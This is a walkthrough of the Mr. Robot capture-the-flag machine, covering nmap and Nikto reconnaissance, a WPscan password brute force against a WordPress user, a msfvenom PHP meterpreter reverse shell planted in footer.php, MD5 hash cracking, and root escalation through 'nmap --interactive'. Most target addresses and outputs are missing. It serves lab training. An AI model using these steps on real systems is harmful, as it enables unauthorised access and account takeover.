Mr. Robot – CTF

This is my walk-through of the Mr. Robot CTF challenge posted on All testing on this image was performed in an isolated lab environment. Understand that using the tools demonstrated in this walk-through against a host without permission is against the law.  Be smart folks, and enjoy the walk-through.

Full NMAP scan of host:

root@kali:~# nmap -p- -A


The NMAP scan shows ports 80 & 443 open.  A quick check with a browser:  Lots to read, and videos too:


A Nikto scan against port 80 tells us that the site is running WordPress, and there is a robots.txt file:

root@kali:~# nikto -h


Using Curl to view robots.txt:

root@kali:~# curl -i -L


The robots.txt file contains 2 entries.  Our first key, and a dictionary file.

Using Curl to view our first key:

root@kali:~# curl -i -L


Downloading the dictionary file using Wget:

root@kali:~/Downloads# wget


So we have our first key, where to now? I know that the site is running WordPress and I have a dictionary file that I will assume contains the password for a WordPress user.  I ran WPscan and didn’t find anything of use.  I tried to enumerate users using both WPscan and Metasploit but no luck.  I tried to brute force the admin user with the dictionary file I downloaded, but that did not work either.  So now what?

I went back and revisited the website, watched all the videos and viewed the source of all of the pages and I found something of interest.  Go back to the main site and type prepare and watch the video:


The video makes reference to a website,  I visited the site and something stood out on the main page: the name Elliot is listed as a command.  Elliot is the main character in the series.  I think we have found our WordPress user:


I used WPscan to brute force the password for elliot using the dictionary I previously downloaded. This took several hours, but it worked. Elliot’s password is ER28-0652:

root@kali:~# wpscan -u --wordlist /root/Downloads/fsocity.dic --username elliot -t 10



Logged into WordPress using Elliot’s credentials:


Elliot has admin privileges in WordPress. An easy way to get a shell is to create PHP reverse shellcode using Msfvenom and add it to one of the WordPress PHP files. In my case I will add my PHP code to footer.php.

Creating reverse shellcode using Msfvenom:

root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=443 -f raw


Pasting my PHP code into the footer.php file.  You can navigate here by clicking on Appearance -> Editor -> footer.php:


Now that I have the shellcode in place, I fire up my Metasploit handler to receive the shell.  You can see my options below:


I execute the shellcode using Curl:


Received the shell with Metasploit:


So now I have a low privilege shell. Poking around a bit, I find key 2 but I don’t have privileges to view it.  I also find a file that contains the username robot and an MD5 password hash:


I use the hashkiller website to crack the hash. The password for robot is abcdefghijklmnopqrstuvwxyz:


I su to robot, and I am able to view key 2:


Poking around a bit more.  There is a root folder.  I am assuming key 3 is there, so we need to escalate privileges on this host.  I download the file to the host and run it. Immediately, I find something interesting:


I run NMAP in interactive mode and drop to a !sh with root privileges.  I find key 3 in the root folder as expected:

robot@linux:/tmp$ nmap --interactive


Hope you found this helpful 🙂
